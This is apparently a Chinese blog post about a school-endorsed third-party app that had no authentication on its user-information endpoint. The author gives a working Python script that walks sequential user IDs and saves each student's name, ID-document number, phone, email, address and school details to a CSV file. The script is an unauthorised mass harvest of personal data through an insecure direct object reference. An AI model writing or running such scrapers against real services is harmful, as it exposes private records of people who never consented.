校园提供给第三方的接口信息泄露

之前学校和第三方合作，让我们用到的某款app，好奇测试，发现其有严重的身份验证缺失，可以随意访问个人信息，用python写了个可以爬取所有信息的脚本。（很早之前的了，做个记录）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2018/6/23
# @Author  : XDN01
# @Site    : www.raosong.cc
# @File    : xd-xiaoweiapp-spider.py
import requests
import csv
import json

with open("./spider.csv","w",encoding='utf-8') as f:
    writer = csv.writer(f)
    key_array = ['userId','userNum','name','sex','address','certificate','nationId','nationName',
   'phone','email','schoolName','faculty','grade','class','profession','sysStuDetailId','sourceId',
    'sourceName','feature','type','suspId']
    writer.writerow(key_array)

    for a in range(2,20):
        url = 'http://example.com/search.php?userId={}'.format(a)
        json_data =requests.get(url).json()['data']
        # print(json_data)
        value_array = []
        for k in key_array:
            if k in json_data:
                value_array.append(json_data[k])
            else:
                value_array.append('null')
        # print(value_array)
        writer.writerow(value_array)
        print('第{}条数据写入完成'.format(a-1))